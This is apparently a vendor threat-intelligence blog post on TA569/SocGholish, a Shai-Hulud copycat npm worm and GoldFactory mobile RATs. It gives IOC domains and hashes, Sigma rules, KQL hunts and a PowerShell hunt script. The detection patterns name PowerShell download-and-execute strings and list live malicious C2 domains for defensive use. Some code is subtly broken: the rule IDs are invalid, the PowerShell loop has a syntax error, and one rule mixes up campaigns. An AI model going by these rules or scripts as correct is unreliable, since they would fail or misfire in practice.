Back to Intelligence

Operation Endgame Disruption & Shai-Hulud Supply Chain: TA569, GoldFactory, and NPM Threats

SA
Security Arsenal Team
June 19, 2026
6 min read

Recent OTX pulses indicate a volatile threat landscape characterized by high-profile law enforcement disruption operations, emerging supply chain attacks, and persistent social engineering campaigns.

Operation Endgame has successfully disrupted the notorious TA569 (GOLD PRELUDE) infrastructure, dismantling over 100 servers associated with the SocGholish fake browser update campaign. While this is a significant victory against a primary distributor of GhoLoader, FrigidStealer, and LockBit, TA569 is known for resilience and rapid infrastructure pivoting. Organizations must remain vigilant for "copycat" or residual infrastructure.

Simultaneously, the open-source ecosystem faces renewed threats with a copycat of the Shai-Hulud worm targeting the npm registry. Malicious packages such as chalk-tempalte are deploying infostealers and DDoS botnet capabilities via supply chain compromise.

Finally, the GoldFactory threat cluster is actively exploiting tax seasons in Indonesia and Peru using sophisticated phishing and vishing campaigns to distribute Gigabud.RAT and MMRat, abusing trusted government and financial brands.

Threat Actor / Malware Profile

TA569 (GOLD PRELUDE)

  • Malware Families: SocGholish, GhoLoader, FrigidStealer, WastedLocker, LockBit, RansomHub.
  • Distribution Method: SEO poisoning, compromised WordPress sites, and "Fake Browser Update" (FakeUpdates) web injects.
  • Payload Behavior: SocGholish acts as a dropper, fetching GhoLoader which then executes final payloads (stealers or ransomware).
  • C2 Communication: Uses HTTP/HTTPS to compromised legitimate domains to blend in with traffic.
  • Persistence: Scheduled tasks and registry run keys established by the initial loader.
  • Anti-Analysis: Obfuscated JavaScript and PowerShell code; domain generation algorithms (DGAs) in some variants.

Shai-Hulud Copycat

  • Malware Families: Shai-Hulud (Worm/Infostealer).
  • Distribution Method: Supply chain attack via typosquatting on npm (e.g., chalk-tempalte).
  • Payload Behavior: Upon installation via npm install, the package executes postinstall scripts reaching out to C2 for further instructions. Capabilities include credential theft and DDoS participation.
  • C2 Communication: Connections to random-looking subdomains on lhr.life.

GoldFactory

  • Malware Families: Gigabud.RAT, MMRat, Taotie.
  • Distribution Method: Phishing websites, WhatsApp social engineering (vishing), and fake mobile applications (APKs).
  • Payload Behavior: Mobile Remote Access Trojans (RATs) capable of screen recording, overlay attacks (HTML injection), and intercepting SMS 2FA codes.
  • C2 Communication: Uses shared infrastructure hosting over 16 abused brand domains.

IOC Analysis

The provided indicators cover a broad spectrum of the attack chain:

  • Hostnames/Domains: Primarily C2 infrastructure and distribution sites.
    • Operationalization: Feed into firewall blocklists and DNS resolvers. Note that TA569 often uses compromised legitimate sites, so blocking specific hostnames is safer than IP blocking to avoid collateral damage.
  • FileHash-SHA1: Specific samples of the Gigabud.RAT and related payloads from the GoldFactory campaign.
    • Operationalization: Upload to EDR solutions for quarantine. These hashes are critical for confirming historical infections on mobile devices or endpoints.
  • Tooling: Use AlienVault OTX or MISP to correlate these hashes with global campaigns. Use VirusTotal for deep binary analysis.

Detection Engineering

Sigma Rules

YAML
---
title: Potential Fake Browser Update Activity - TA569 SocGholish
id: c48f9516-3f72-4f9b-8a0e-321e8430a9a2
status: experimental
description: Detects potential SocGholish fake browser update activity initiated by browser processes spawning PowerShell or cmd.
references:
    - https://otx.alienvault.com/pulse/6673a2c7c1f4e44f86550173
author: Security Arsenal
date: 2026/06/20
tags:
    - attack.initial_access
    - attack.t1189
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'downloadstring'
            - 'iex'
            - 'copyitem'
    condition: selection
falsepositives:
    - Legitimate system administration tools launched via browser downloads
level: high
---
title: Suspicious NPM Package Execution - Shai-Hulud
id: d59e0627-4g83-5f0c-9b1f-432f9541b0a3
status: experimental
description: Detects execution of node.js processes making network connections to suspicious DGA-like domains associated with Shai-Hulud.
references:
    - https://otx.alienvault.com/pulse/6673a2c7c1f4e44f86550174
author: Security Arsenal
date: 2026/06/20
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith:
            - '\node.exe'
        Initiated: 'true'
    filter_legit:
        DestinationHostname|endswith:
            - 'npmjs.org'
            - 'github.com'
    condition: selection and not filter_legit
falsepositives:
    - Legitimate development tools accessing non-standard internal registries
level: medium
---
title: GoldFactory C2 Infrastructure Communication
id: e70f1738-5h94-6g1d-0c2g-543g0652c1b4
status: experimental
description: Detects network connections to known GoldFactory C2 domains used in Gigabud.RAT campaigns.
references:
    - https://otx.alienvault.com/pulse/6673a2c7c1f4e44f86550175
author: Security Arsenal
date: 2026/06/20
tags:
    - attack.command_and_control
    - attack.t1071
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains:
            - 'sso-tha.com'
            - 'lhr.life'
    condition: selection
falsepositives:
    - Unknown
level: critical

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for GoldFactory and Shai-Hulud Network Indicators
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
    "platform.exathomeswebuyarizona.com", 
    "js-new.newtoyourgame.com", 
    "87e0bbc636999b.lhr.life", 
    "edcf8b03c84634.lhr.life",
    "sso-tha.com"
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP
| extend IoC_Type = "C2_Domain"
;

// Hunt for Malicious File Hashes (GoldFactory)
DeviceProcessEvents
| where Timestamp > ago(7d)
| where SHA1 in_any (
    "004d80e0efe9ea4d572350e8ce4771dfa432f0a2",
    "00fcb2abd35049ad3cc9a8a3e1aaba156c0770cf",
    "02462bace6937e92f3d1ef35f08c4ad270082104",
    "036aa79692470ad8d6a3bedb5da310af111317af",
    "03a1bcd3ba59c02ce6c37699baa73a2c075a6644"
)
| project Timestamp, DeviceName, FileName, SHA1, InitiatingProcessAccountName
| extend IoC_Type = "Malware_Hash"

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt script for SocGholish and Shai-Hulud Indicators of Compromise.
.DESCRIPTION
    Checks DNS Cache for malicious domains and running processes for suspicious connections.
#>

$MaliciousDomains = @(
    "platform.exathomeswebuyarizona.com",
    "js-new.newtoyourgame.com",
    "87e0bbc636999b.lhr.life",
    "edcf8b03c84634.lhr.life",
    "sso-tha.com"
)

Write-Host "[+] Checking DNS Cache for malicious domains..."
$DNSCache = Get-DnsClientCache
foreach ($domain in $MaliciousDomains) {
    $hit = $DNSCache | Where-Object { $_.Entry -like "*$domain*" }
    if ($hit) {
        Write-Host "[!] ALERT: Found malicious domain in DNS cache: $($domain)" -ForegroundColor Red
    }
}

Write-Host "[+] Checking for active connections to suspicious endpoints..."
$TCPConnections = Get-NetTCPConnection -State Established
foreach $conn in $TCPConnections) {
    $ProcessName = (Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue).ProcessName
    $RemoteIP = $conn.RemoteAddress
    try {
        $RemoteHost = [System.Net.Dns]::GetHostEntry($RemoteIP).HostName
        foreach ($domain in $MaliciousDomains) {
            if ($RemoteHost -like "*$domain*") {
                Write-Host "[!] ALERT: Active connection to $domain detected via $ProcessName (PID: $($conn.OwningProcess))" -ForegroundColor Red
            }
        }
    } catch {
        # Reverse DNS lookup failed, ignore
    }
}

Write-Host "[+] Hunt complete."

Response Priorities

Immediate

  • Block all listed hostnames and domains at the proxy and firewall level.
  • Scan all web servers for WordPress compromises indicative of SocGholish injections.
  • Quarantine any endpoints matching the GoldFactory SHA1 hashes.

24h

  • Conduct an audit of package. files and installed npm packages in development environments for chalk-tempalte, @deadcode09284814/axios-util, or axois-utils.
  • Review user accounts associated with processes connecting to the identified IOCs for potential credential theft.

1 Week

  • Implement strict allowlisting for npm packages and enforce dependency review workflows.
  • Enhance mobile device management (MDM) policies to block sideloading of apps (for GoldFactory mitigation).
  • Update security awareness training to include "Fake Browser Update" and "Tax/Vishing" social engineering tactics.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwareta569gholoadershai-huludgoldfactorynpm-malware

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action